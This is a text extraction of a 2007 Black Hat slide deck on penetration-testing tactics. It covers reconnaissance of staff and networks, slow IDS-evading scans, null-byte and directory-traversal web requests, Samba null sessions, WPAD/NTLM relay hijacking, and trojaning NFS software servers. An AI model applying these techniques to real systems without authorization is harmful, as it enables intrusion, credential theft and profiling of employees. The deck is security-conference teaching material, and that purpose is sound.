Tactical Exploitation Tactical Exploitation the other way to - - PowerPoint PPT Presentation

tactical exploitation tactical exploitation
SMART_READER_LITE
LIVE PREVIEW

Tactical Exploitation Tactical Exploitation the other way to - - PowerPoint PPT Presentation

Tactical Exploitation Tactical Exploitation the other way to pen-test the other way to pen-test hdm / valsmith hdm / valsmith Black Hat USA 2007 Black Hat USA 2007 Las Vegas August 2007 who are we ? who are we ? H D


slide-1
SLIDE 1

Las Vegas – August 2007

Tactical Exploitation Tactical Exploitation

“ “the other way to pen-test “ the other way to pen-test “

hdm / valsmith hdm / valsmith

Black Hat USA 2007 Black Hat USA 2007

slide-2
SLIDE 2

Las Vegas – August 2007

who are we ? who are we ?

H D Moore <hdm [at] metasploit.com>

BreakingPoint Systems || Metasploit

Valsmith <valsmith [at] metasploit.com>

Offensive Computing || Metasploit

slide-3
SLIDE 3

Las Vegas – August 2007

why listen ? why listen ?

  • A different approach to pwning
  • Lots of fun techniques, new tools
  • Real-world tested ;-)
slide-4
SLIDE 4

Las Vegas – August 2007

what do we cover ? what do we cover ?

  • Target profiling
  • Discovery tools and techniques
  • Exploitation
  • Getting you remote access
slide-5
SLIDE 5

Las Vegas – August 2007

the tactical approach the tactical approach

  • Vulnerabilites are transient
  • Target the applications
  • Target the processes
  • Target the people
  • Target the trusts
  • You WILL gain access.
slide-6
SLIDE 6

Las Vegas – August 2007

the tactical approach the tactical approach

  • Crackers are opportunists
  • Expand the scope of your tests
  • Everything is fair game
  • What you dont test...
  • Someone else will!
slide-7
SLIDE 7

Las Vegas – August 2007

the tactical approach the tactical approach

  • Hacking is not about exploits
  • The target is the data, not r00t
  • Hacking is using what you have
  • Passwords, trust relationships
  • Service hijacking, auth tickets
slide-8
SLIDE 8

Las Vegas – August 2007

personnel discovery personnel discovery

  • Security is a people problem
  • People write your software
  • People secure your network
  • Identify the meatware first
slide-9
SLIDE 9

Las Vegas – August 2007

personnel discovery personnel discovery

  • Identifying the meatware
  • Google
  • Newsgroups
  • SensePost tools
  • Evolution from Paterva.com
slide-10
SLIDE 10

Las Vegas – August 2007

personnel discovery personnel discovery

  • These tools give us
  • Full names, usernames, email
  • Employment history
  • Phone numbers
  • Personal sites
slide-11
SLIDE 11

Las Vegas – August 2007

personnel discovery personnel discovery

slide-12
SLIDE 12

Las Vegas – August 2007

personnel discovery personnel discovery

  • Started with company and jobs
  • Found online personnel directory
  • Found people with access to data
  • Found resumes, email addresses
  • Email name = username = target
slide-13
SLIDE 13

Las Vegas – August 2007

personnel discovery personnel discovery

  • Joe Targetstein
  • Works as lead engineer in semiconductor department
  • Email address joet@company.com
  • Old newsgroup postings show

joet@joesbox.company.com

  • Now we have username and a host to target to go

after semi conductor information

slide-14
SLIDE 14

Las Vegas – August 2007

network discovery network discovery

  • Identify your target assets
  • Find unknown networks
  • Find third-party hosts
  • Dozens of great tools...
  • Lets stick to the less-known ones
slide-15
SLIDE 15

Las Vegas – August 2007

network discovery network discovery

  • The overused old busted
  • Whois, Google, zone transfers
  • Reverse DNS lookups
slide-16
SLIDE 16

Las Vegas – August 2007

network discovery network discovery

  • The shiny new hotness
  • Other people's services
  • CentralOps.net, DigitalPoint.com
  • DomainTools.com
  • Paterva.com
slide-17
SLIDE 17

Las Vegas – August 2007

network discovery network discovery

  • DomainTools vs Defcon.org

1. Darktangent.net 0 listings0 listings0 listings 2. Defcon.net 0 listings0 listings0 listings 3. Defcon.org 1 listings18 listings 1 listings 4. Hackerjeopardy.com 0 listings0 listings0 listings 5. Hackerpoetry.com0 listings0 listings0 listings 6. Thedarktangent.com 0 listings0 listings0 listings 7. Thedarktangent.net 0 listings0 listings0 listings 8. Thedarktangent.org 0 listings0 listings0 listings

slide-18
SLIDE 18

Las Vegas – August 2007

network discovery network discovery

  • DomainTools vs Defcon.net
  • 1. 0day.com

0 listings0 listings0 listings

  • 2. 0day.net 0 listings0 listings0 listings
  • 3. Darktangent.org

0 listings0 listings0 listings [ snipped personal domains ]

  • 12. Securityzen.com 0 listings0 listings0 listings
  • 13. Zeroday.com 0 listings0 listings0 listings
slide-19
SLIDE 19

Las Vegas – August 2007

network discovery network discovery

  • What does this get us?
  • Proxied DNS probes, transfers
  • List of virtual hosts for each IP
  • Port scans, traceroutes, etc
  • Gold mine of related info
slide-20
SLIDE 20

Las Vegas – August 2007

network discovery network discovery

  • Active discovery techniques
  • Trigger SMTP bounces
  • Brute force HTTP vhosts
  • Watch outbound DNS
  • Just email the users!
slide-21
SLIDE 21

Las Vegas – August 2007

network discovery network discovery

Received: from unknown (HELO gateway1.rsasecurity.com) (216.162.240.250) by [censored] with SMTP; 28 Jun 2007 15:11:29 -0500 Received: from hyperion.rsasecurity.com by gateway1.rsasecurity.com via smtpd (for [censored]. [xxx.xxx.xxx.xxx]) with SMTP; Thu, 28 Jun 2007 16:11:29 -0400 by hyperion.na.rsa.net (MOS 3.8.3-GA) To: user@[censored] Subject: Returned mail: User unknown (from [10.100.8.152])

slide-22
SLIDE 22

Las Vegas – August 2007

application discovery application discovery

  • If the network is the toast...
  • Applications are the butter.
  • Each app is an entry point
  • Finding these apps is the trick
slide-23
SLIDE 23

Las Vegas – August 2007

application discovery application discovery

  • Tons of great tools
  • Nmap, Amap, Nikto, Nessus
  • Commercial tools
slide-24
SLIDE 24

Las Vegas – August 2007

application discovery application discovery

  • Slow and steady wins the deface
  • Scan for specific port, one port only
  • IDS/IPS can't handle slow scans
  • Ex. nmap -sS -P0 -T 0 -p 1433 ips
slide-25
SLIDE 25

Las Vegas – August 2007

application discovery application discovery

  • Example target had custom IDS to

detect large # of host connections

  • Standard nmap lit up IDS like XMAS
  • One port slow scan never detected
  • Know OS based on 1 port (139/22)
slide-26
SLIDE 26

Las Vegas – August 2007

application discovery application discovery

  • Target had internal app for software licensing /

distribution

  • ~10,000 nodes had app installed
  • A couple of hours with IDA/Ollydbg showed

static Admin password in app's memory

  • All accessible nodes owned, 0 exploits used
slide-27
SLIDE 27

Las Vegas – August 2007

application discovery application discovery

  • Web Application Attack and Audit

Framework

  • W3AF: “Metasploit for the web”
  • Metasploit 3 scanning modules
  • Scanning mixin
slide-28
SLIDE 28

Las Vegas – August 2007

application discovery application discovery

DEMO

slide-29
SLIDE 29

Las Vegas – August 2007

client app discovery client app discovery

  • Client applications are fun!
  • Almost always exploitable
  • Easy to fingerprint remotely
  • Your last-chance entrance
slide-30
SLIDE 30

Las Vegas – August 2007

client app discovery client app discovery

  • Common probe methods
  • Mail links to the targets
  • Review exposed web logs
  • Send MDNs to specific victims
  • Abuse all, everyone, team aliases
slide-31
SLIDE 31

Las Vegas – August 2007

process discovery process discovery

  • Track what your target does
  • Activity via IP ID counters
  • Last-modified headers
  • FTP server statistics
slide-32
SLIDE 32

Las Vegas – August 2007

process discovery process discovery

  • Look for patterns of activity
  • Large IP ID increments at night
  • FTP stats at certain times
  • Microsoft FTP SITE STATS
  • Web pages being uploaded
  • Check timestamps on images
slide-33
SLIDE 33

Las Vegas – August 2007

process discovery process discovery

  • Existing tools?
  • None, really...
  • Easy to script
  • Use “hping” for IP ID tracking
  • Use netcat for SITE STATS
slide-34
SLIDE 34

Las Vegas – August 2007

process discovery process discovery

ABOR : 2138 ACCT : 2 ALLO : 32 APPE : 74 CDUP : 5664 CWD : 388634 DELE : 1910 FEAT : 2970 HELP : 470 LIST : 3228866 MDTM : 49070 MKD : 870 MODE : 3938 NLST : 1492 NOOP : 147379 OPTS : 21756 PASS : 2050555100 PASV : 2674909 PORT : 786581 PWD : 179852 QUIT : 143771 REIN : 16 REST : 31684 RETR : 153140 RMD : 41 RNFR : 58 RNTO : 2 SITE : 2048 SIZE : 76980 SMNT : 16 STAT : 30812 STOR : 3035 STRU : 3299 SYST : 175579 TYPE : 3038879 USER : 2050654280 XCWD : 67 XMKD : 12 XPWD : 1401 XRMD : 2

ftp.microsoft.com [node] SITE STATS / Uptime: 47 days

slide-35
SLIDE 35

Las Vegas – August 2007

process discovery process discovery

IP ID Monitoring / HACKER.COM

<< backups run at midnight USA people wake up >>

slide-36
SLIDE 36

Las Vegas – August 2007

15 Minute Break 15 Minute Break

  • Come back for the exploits!
slide-37
SLIDE 37

Las Vegas – August 2007

re-introduction re-introduction

  • In our last session...
  • Discovery techniques and tools
  • In this session...
  • Compromising systems!
slide-38
SLIDE 38

Las Vegas – August 2007

external network external network

  • The crunchy candy shell
  • Exposed hosts and services
  • VPN and proxy services
  • Client-initiated sessions
slide-39
SLIDE 39

Las Vegas – August 2007

attacking ftp transfers attacking ftp transfers

  • Active FTP transfers
  • Clients often expose data ports
  • NAT + Active FTP = Firewall Hole
  • Passive FTP transfers
  • Data port hijacking: DoS at least
  • pasvagg.pl still works just fine :-)
slide-40
SLIDE 40

Las Vegas – August 2007

attacking web servers attacking web servers

  • Brute force vhosts, files, dirs
  • http://www.cray.com/old/
  • Source control files left in root
  • http://www.zachsong.com/CVS/Entries
slide-41
SLIDE 41

Las Vegas – August 2007

attacking web servers attacking web servers

  • Apache Reverse Proxying

GET /%00 HTTP/1.1 Host: realhost.com

  • Apache Dynamic Virtual Hosting

GET / HTTP/1.1 Host: %00/

slide-42
SLIDE 42

Las Vegas – August 2007

load balancers load balancers

  • Cause load balancer to “leak”

internal IP information

  • Use TCP half-close HTTP request
  • Alteon ACEdirector good example
slide-43
SLIDE 43

Las Vegas – August 2007

load balancers load balancers

  • ACEdirector mishandles TCP half-

close requests

  • Behavior can be used as signature

for existence of Load Balancer

  • Direct packets from real webserver

fowarded back to client (with IP)

slide-44
SLIDE 44

Las Vegas – August 2007

cgi case study cgi case study

  • Web Host with 1000's of sites
  • Had demo CGI for customers
  • CGI had directory traversal
  • www.host.com/cgi-bin/vuln.pl/../../cgi
  • CGI executable + writable on every

directory

  • Common on web hosts!
slide-45
SLIDE 45

Las Vegas – August 2007

cgi case study cgi case study

  • Enumerated:
  • Usernames
  • Dirs
  • Backup files
  • Other CGI scripts
  • VHOSTS
slide-46
SLIDE 46

Las Vegas – August 2007

cgi case study cgi case study

  • Target happened to run solaris
  • Solaris treats dirs as files
  • cat /dirname = ls /dirname
  • http://www.host.com/cgi-bin/vuln.cgi/../../../../dirname%00.html
slide-47
SLIDE 47

Las Vegas – August 2007

cgi case study cgi case study

  • Found CGI script names
  • Googled for vulns
  • Gained shell 100's of different ways
  • Owned due to variety of layered

configuration issues

slide-48
SLIDE 48

Las Vegas – August 2007

attacking dns servers attacking dns servers

  • Brute force host names
  • XID sequence analysis
  • BIND 9: PRNG / Birthday
  • VxWorks: XID = XID + 1
  • Return extra answers in response
slide-49
SLIDE 49

Las Vegas – August 2007

authentication relays authentication relays

  • SMB/CIFS clients are fun!
  • Steal hashes, redirect, MITM
  • NTLM relay between protocols
  • SMB/HTTP/SMTP/POP3/IMAP
  • More on this later...
slide-50
SLIDE 50

Las Vegas – August 2007

social engineering social engineering

  • Give away free toys
  • CDROMs, USB keys, N800s
  • Replace UPS with OpenWRT
  • Cheap and easy to make
slide-51
SLIDE 51

Las Vegas – August 2007

internal network internal network

  • The soft chewy center
  • This is the fun part :)
  • Easy to trick clients
slide-52
SLIDE 52

Las Vegas – August 2007

netbios services netbios services

  • NetBIOS names are magic
  • WPAD
  • CALICENSE
slide-53
SLIDE 53

Las Vegas – August 2007

dns services dns services

  • Microsoft DNS + DHCP = fun
  • Inject host names into DNS
  • Hijack the entire network
  • dhcpcd -h WPAD -i eth0
slide-54
SLIDE 54

Las Vegas – August 2007

Hijacking NTLM Hijacking NTLM

  • Quickly own all local workstations
  • Gain access to mail and web sites
  • A new twist on “smbrelay2.cpp”
  • Yes, it was released in 2001.
  • Now implemented in Metasploit 3
slide-55
SLIDE 55

Las Vegas – August 2007

Hijacking NTLM Hijacking NTLM

  • 1. MITM all outbound web traffic
  • Cache poison the “WPAD” host
  • Plain old ARP spoofing
  • DHCP / NetBIOS + “WPAD”
  • Run a rogue WiFi access point
  • Manipulate TOR connections
slide-56
SLIDE 56

Las Vegas – August 2007

Hijacking NTLM Hijacking NTLM

  • 2. Redirect HTTP requests to “intranet”
  • WPAD + SOCKS server
  • SQUID + transparent proxying
  • 302 Redirect
slide-57
SLIDE 57

Las Vegas – August 2007

Hijacking NTLM Hijacking NTLM

  • 3. Return HTML page with UNC link
  • IE 5/6/7: <img src=”\\ip\share\i.jpg”>
  • Firefox: mozicon-url:file:////ip/share/i.jpg
  • Third-party plugins:
  • Adobe PDF Viewer
  • Windows Media Player
  • Microsoft Office
slide-58
SLIDE 58

Las Vegas – August 2007

Hijacking NTLM Hijacking NTLM

  • 4. Accept SMB connection and relay
  • Accept connection from the client
  • Connect to the target server (or client)
  • Ask target for Challenge Key
  • Provide this Key to the client
  • Allow the client to authenticate
slide-59
SLIDE 59

Las Vegas – August 2007

Hijacking NTLM Hijacking NTLM

  • 5. Executing remote code
  • Disconnect the client
  • Use authenticated session
  • ADMIN$ + Service Control Manager
  • Access data, call RPC routines, etc
  • Access the remote registry
slide-60
SLIDE 60

Las Vegas – August 2007

Hijacking NTLM Hijacking NTLM

DEMO

slide-61
SLIDE 61

Las Vegas – August 2007

file servers file servers

  • “NAS appliances are safe and secure”
  • Don't worry, the vendor sure doesn't
  • Unpatched Samba daemons
  • Snap, TeraServer, OS X, etc.
  • Inconsistent file permissions
  • AFP vs NFS vs SMB
slide-62
SLIDE 62

Las Vegas – August 2007

samba is awesome samba is awesome

  • 1999 called, want their bugs back
  • Remember those scary “NULL Sessions”
  • Samba ENUM / SID2USR user listing
  • Massive information leaks via DCERPC
  • Shares, Users, Policies
  • Brute force accounts (no lockout)
slide-63
SLIDE 63

Las Vegas – August 2007

smb case study smb case study

  • Old bugs back to haunt new boxes
  • Found OS X Box running SMB
  • User sent mail touting OS X sec
  • Previous scans had found vulns
  • User: “false positive, its OS X”
  • Us: “Owned”
slide-64
SLIDE 64

Las Vegas – August 2007

smb case study smb case study

  • Performed Null Session
  • net use \\osxsmb\ipc$ “” /user:””
  • Enumerated users and shares
  • Brute forced several user accounts
  • Got shell, escalated to root
  • User: “but . .but . . its OS X!”
slide-65
SLIDE 65

Las Vegas – August 2007

samba vs metasploit samba vs metasploit

  • Metasploit modules for Samba
  • Linux (vSyscall + Targets)
  • Mac OS X (PPC/x86)
  • Solaris (SPARC,x86)
  • Auxiliary PoCs
slide-66
SLIDE 66

Las Vegas – August 2007

nfs services nfs services

  • NFS is your friend
  • Dont forget its easy cousin NIS
  • Scan for port 111 / 2049
  • showmount -e / showmount -a
  • Whats exported, whose mounting?
slide-67
SLIDE 67

Las Vegas – August 2007

nfs services nfs services

  • Exported NFS home directories
  • Important target!
  • If you get control
  • Own every node that mounts it
slide-68
SLIDE 68

Las Vegas – August 2007

nfs services nfs services

  • If you are root on home server
  • Become anyone (NIS/su)
  • Harvest known_hosts files
  • Harvest allowed_keys
  • Modify .login, etc. + insert trojans
slide-69
SLIDE 69

Las Vegas – August 2007

nfs services nfs services

  • Software distro servers are fun!
  • All nodes access over NFS
  • Write to software distro directories
  • Trojan every node at once
  • No exploits needed!
slide-70
SLIDE 70

Las Vegas – August 2007

file services file services

  • Example: all nodes were diskless / patched
  • Clients got software from NFS server
  • We hacked the software server
  • Using trust hijacking explained later
  • Inserted trojaned gnu binaries
  • 1000's of nodes sent us shells
slide-71
SLIDE 71

Las Vegas – August 2007

trust relationships trust relationships

  • The target is unavailable to YOU
  • Not to another host you can reach...
  • Networks may not trust everyone
  • But they often trust each other :)
slide-72
SLIDE 72

Las Vegas – August 2007

trusts trusts

  • Deal with firewalls/TCP wrappers/ACLs
  • Find a node that is accepted and own it
  • People wrapper Unix and leave Windows
  • pen
  • Hack the Windows box and port forward

past wrappers

slide-73
SLIDE 73

Las Vegas – August 2007

trusts trusts

  • Example: Mixed network with Unix

wrapperd

  • Target Solaris homedir server
  • Had auth credentials but couldn't reach

port 22

  • Found 1 vulnerable win box , owned /

installed portfworward to homedir port 22

slide-74
SLIDE 74

Las Vegas – August 2007

Hijacking SSH Hijacking SSH

  • Idea is to abuse legitimate users access
  • ver SSH
  • If user can access other systems, why

can't you? (even without users password)

  • One time passwords? No problem!
  • Intel gathering
slide-75
SLIDE 75

Las Vegas – August 2007

Hijacking SSH Hijacking SSH

  • Available tools
  • Metalstorm ssh hijacking
  • Trojaned ssh clients
  • SSH master modes
  • Dont for get TTY hijacking
  • Appcap
  • TTYWatcher
  • Who suspects a dead SSH session?
slide-76
SLIDE 76

Las Vegas – August 2007

Hijacking SSH Hijacking SSH

DEMO

slide-77
SLIDE 77

Las Vegas – August 2007

Hijacking Kerberos Hijacking Kerberos

  • Kerberos is great for one time

authentication . . even for hackers

  • Idea is to become a user and hijack

kerberos tickets

  • Gain access to other trusted nodes
slide-78
SLIDE 78

Las Vegas – August 2007

Hijacking Kerberos Hijacking Kerberos

DEMO

slide-79
SLIDE 79

Las Vegas – August 2007

Conclusion Conclusion

  • Compromise a “secure” network
  • Determination + creativity wins
  • Tools cannot replace talent.